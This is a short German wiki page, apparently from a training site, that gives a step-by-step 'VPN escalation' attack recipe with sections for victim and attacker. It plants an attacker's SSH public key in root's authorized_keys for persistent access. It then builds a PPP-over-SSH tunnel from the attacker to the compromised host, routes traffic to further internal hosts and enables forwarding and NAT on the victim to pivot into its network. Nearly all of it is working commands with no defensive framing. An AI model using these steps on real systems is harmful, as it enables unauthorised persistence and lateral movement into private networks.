Vpn-eskalation

Aus xinux.net
Zur Navigation springen Zur Suche springen


Opfer

Läuft ssh?

  • netstat -lntp | grep 22
tcp6  0      0 :::22   :::*  LISTEN      4360/sshd

SSH Key für root hinterlegen

  • cat<<HERE >> ~/.ssh/authorized_keys
ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQCyfX1o6lByLHpnY1IUPYTphHAPECeKukP7kxZOuLCxO7xSIejrwSABRccyPbRu49Y8uuFKrpTHyUWf4H5e/lUH56EWETA6QYrpfNnbwXkMeNmOQ4QBw3y2gF978u4dPelfGn0iLZfqsO5PcvYR8+Mz8GiAGnEtoGpctYoSku1AlzENQVIiK61YrEVJ2dJ59wo6p14JA3Lu6ka/FazCzcA3rtMQyfwwy4LVcKxJ63SBfg7HLRwNu1+9M9oWMr2+RVTN/WAlXmNgF8hnCNR9liNrVKMnKiOPEpMm3+5/KgHmZKy3Da8TrPr9AXiMkZyTkrxs1DyTgojFUEoxrtM60iayPkRjQRB/eYItCSXT6AICmlVAOwPQYVW3PT8QhK5PGxhr72xMA3ehQheeupWPmzXyvYxzfbJCm9GnyFxde+Ylp69/VSmzZrT9E8PIVCWSra7YHuO+JYFMBhDbaexiHOD+Akltb4IbImMlMyOYvkRRWTRssiO543BhdDmyDtiQE+U= root@tauron
HERE

VPN einrichten um Zugriff zum Netz zu erlangen

  • apt-get install ppp

Angreifer

Vpn-Hack

  • pppd updetach noauth passive pty "autossh -D 19999 -P 10.80.100.105 -p 22 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
  • ip route add 10.80.100.101/32 via 172.29.29.1
  • ip route add 10.80.100.102/32 via 172.29.29.1
  • ip route add 10.80.100.103/32 via 172.29.29.1
  • ip route add 10.80.100.104/32 via 172.29.29.1
  • ip route add 10.80.100.106/32 via 172.29.29.1
  • ip route add 10.80.100.107/32 via 172.29.29.1
  • ip route add 10.80.100.108/32 via 172.29.29.1

Opfer

VPN Forward und Nat

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -I POSTROUTING -j SNAT -s 172.29.29.2 --to 10.80.100.105